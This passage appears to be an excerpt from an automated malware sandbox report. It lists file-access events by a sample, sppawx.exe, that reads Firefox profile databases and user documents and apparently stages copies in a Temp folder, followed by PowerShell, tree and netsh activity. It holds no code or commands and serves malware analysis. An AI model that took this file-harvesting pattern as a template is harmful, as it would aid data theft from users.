              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\storage.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \System\System Info.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AIXACVYBSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\AIXACVYBSB.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\FACWLRWHGG.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\FACWLRWHGG.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\FACWLRWHGG.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\MQAWXUYAIK.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\MQAWXUYAIK.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\MQAWXUYAIK.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\MQAWXUYAIK.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\PSAMNLJHZW.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW.mp3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\PSAMNLJHZW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\PSAMNLJHZW.pdf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\QVTVNIBKSD.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\QVTVNIBKSD.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\QVTVNIBKSD.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\QVTVNIBKSD.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\TTCBKWZYOC.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\webappsstore.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\TTCBKWZYOC.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\TTCBKWZYOC.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\TTCBKWZYOC.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\XQACHMZIHU.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.docx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\XQACHMZIHU.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\XQACHMZIHU.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\ZSSZYEFYMU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Desktop\ZSSZYEFYMU.png VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Documents\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeQueries volume information: C:\Users\user\Documents\AFWAAFRXKO.jpg VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
